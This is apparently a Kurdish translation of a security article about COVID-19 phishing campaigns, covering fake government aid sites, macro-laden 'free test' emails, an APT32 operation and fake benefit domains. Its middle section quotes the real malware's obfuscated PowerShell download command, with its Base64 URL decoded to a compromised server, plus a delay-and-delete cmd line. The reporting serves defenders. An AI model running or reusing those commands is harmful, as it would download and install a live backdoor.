Êrîşker berdewam dikin ku mijara COVID-19 bikar bînin, ji bo bikarhênerên ku bi dilşikestî bi her tiştê ku bi serhildanê ve girêdayî ne re metirsiyan diafirînin. LI Me berê jî li ser çi cûreyên malware di paşiya coronavirus de xuya kir, û îro em ê li ser teknîkên endezyariya civakî yên ku bikarhênerên li welatên cihê, tevî Rûsyayê, berê pê re rû bi rû mane, biaxivin. Meyl û nimûneyên giştî di bin qutbûnê de ne.
Bi bîr bîne Me li ser vê yekê axivî ku mirov amade ne tenê li ser coronavirus û qursa serhildanê, lê di heman demê de li ser tedbîrên piştgirîya darayî jî bixwînin? Li vir mînakek baş e. Li eyaleta Nordrhein-Westfalya ya Almanyayê ango NRW êrîşeke fîşayê ya balkêş hat dîtin. Êrîşkaran kopiyên malpera Wezareta Aboriyê (), ku her kes dikare serlêdana alîkariya darayî bike. Bernameyek wusa bi rastî heye, û derket holê ku ew ji bo xapînokan sûdmend e. Piştî ku daneyên kesane yên qurbaniyên xwe wergirtin, wan serîlêdanek li ser malpera wezaretê ya rastîn kirin, lê hûrguliyên bankê yên din destnîşan kirin. Li gorî daneyên fermî, heta ku ev plan were dîtin 4 hezar daxwazên sexte hatine kirin. Di encamê de 109 milyon dolarên ku ji bo welatiyên mexdûr hatibûn amadekirin, ketin destê sextekaran.
Ma hûn ji bo COVID-19 ceribandinek belaş dixwazin?
Nimûneyek din a girîng a fîşekirina bi mijara coronavirus bû di emailan de. Peyaman bi pêşniyara ceribandina belaş a ji bo enfeksiyona coronavirus bala bikarhêneran kişand. Di pêveka van de bûn mînakên Trickbot / Qakbot / Qbot hene. Û gava ku yên ku dixwazin tenduristiya xwe kontrol bikin dest bi "dagirtina forma pêvekirî" kirin, skrîptek xirab li ser komputerê hate dakêşandin. Û ji bo ku ji ceribandina sandboxê dûr bixin, skrîptê tenê piştî demekê dest bi dakêşana vîrusa sereke kir, dema ku pergalên parastinê pê bawer bûn ku dê ti çalakiyek xirab çênebe.
Qanikirina pir bikarhêneran ji bo çalakkirina makroyan jî hêsan bû. Ji bo kirina vê yekê, hîleyek standard hate bikar anîn: ji bo dagirtina pirsnameyê, hûn pêşî hewce ne ku makroyan çalak bikin, ku tê vê wateyê ku hûn hewce ne ku skrîptek VBA bimeşînin.
Wekî ku hûn dikarin bibînin, skrîpta VBA bi taybetî ji antivirusan tê mask kirin.
Windows xwedan taybetmendiyek bendewariyê ye ku serîlêdan li bendê ye /T <çirk> berî ku bersiva xwerû "Erê" qebûl bike. Di rewşa me de, berî ku pelên demkî jêbirin, skrîpt 65 çirke li bendê ma:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Û dema ku li bendê bû, malware hate dakêşandin. Ji bo vê yekê skrîptek PowerShell ya taybetî hate destpêkirin:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Piştî deşîfrekirina nirxa Base64, skrîpta PowerShell paşperdeya ku li ser servera webê ya berê hatî hackkirin ji Almanyayê dadixe:
http://automatischer-staubsauger.com/feature/777777.pngû wê di bin navê de tomar dike:
C:UsersPublictmpdirfile1.exe
peldanka ‘C:UsersPublictmpdir’ dema ku pela 'tmps1.bat' ya ku ferman dihewîne tê jêbirin cmd /c mkdir ""C:UsersPublictmpdir"".
Li dijî saziyên dewletê êrîşeke armanckirî pêk hat
Wekî din, analîstên FireEye herî dawî êrîşek APT32 ya armanckirî ragihand ku armanc li avahiyên hukûmetê yên li Wuhan, û her weha Wezareta Rêvebiriya Lezgîn a Chineseînî ye. Yek ji RTF-yên belavbûyî lînka gotarek New York Times a bi sernavê hebû . Lêbelê, piştî xwendina wê, malware hate dakêşandin (analîstên FireEye mînak wekî METALJACK nas kirin).
Balkêş e, li gorî Virustotal, di dema tespîtkirinê de, yek ji antivirusan ev mînak nedît.
Dema ku malperên fermî dakêşin
Nimûneya herî berbiçav a êrîşa fîshingê çend roj berê li Rûsyayê qewimî. Sedema vê yekê ji bo zarokên di navbera 3 û 16 salî de tayînkirina feydeyek ku demek dirêj dihat hêvîkirin bû. Dema ku destpêka pejirandina serîlêdanan di 12ê Gulana 2020-an de hate ragihandin, bi mîlyonan ji bo arîkariya dirêj-hêvî li malpera Karûbarên Dewletê bazdan û portal ji êrîşek DDoS-ya profesyonel ne xirabtir anîn xwarê. Dema ku serokkomar got ku "Xizmetên Hikûmetê nikarîbûn bi herikîna serlêdanan re rû bi rû bimînin", mirovan dest bi axaftina serhêl li ser vekirina malperek alternatîf ji bo qebûlkirina serlêdanan kir.
Pirsgirêk ev e ku çend malperan bi yekcarî dest bi xebatê kirin, û dema ku yek, ya rastîn li posobie16.gosuslugi.ru, bi rastî serlêdanan qebûl dike, bêtir .
Hevalên SearchInform li herêma .ru nêzî 30 domainên sextekar ên nû dîtin. Pargîdaniya Infosecurity û Softline ji destpêka Nîsanê ve zêdetirî 70 malperên karûbarê hukûmetê yên sexte yên mîna hev şopandine. Afirînerên wan sembolên nas manîpule dikin û di heman demê de berhevokên peyvên gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, û hwd.
Hype û endezyariya civakî
Hemî van mînakan tenê piştrast dikin ku êrîşkar bi serfirazî ji mijara coronavirus drav didin. Û her ku tansiyona civakî bilindtir bibe û pirsgirêkên nezelaltir be, şansên sextekar jî ew qas zêdetir in ku daneyên girîng didizin, mirovan neçar dikin ku dev ji dravê xwe berdin, an jî bi tenê bêtir komputeran hack bikin.
Û ji ber ku pandemîk neçar kiriye ku mirovên potansiyel ne amade ne ku bi girseyî ji malê bixebitin, ne tenê daneyên kesane, lê di heman demê de daneyên pargîdanî jî di xetereyê de ne. Mînakî, di van demên dawî de bikarhênerên Microsoft 365 (berê Office 365) jî rastî êrîşek phishing hatin. Mirov peyamên dengî yên girseyî yên "bêndabûyî" wekî pêvekên tîpan distînin. Lêbelê, pel bi rastî rûpelek HTML-ê bûn ku mexdûrên êrîşê şandin . Wekî encamek, windakirina gihîştinê û lihevhatina hemî daneyên ji hesabê.
Source: www.habr.com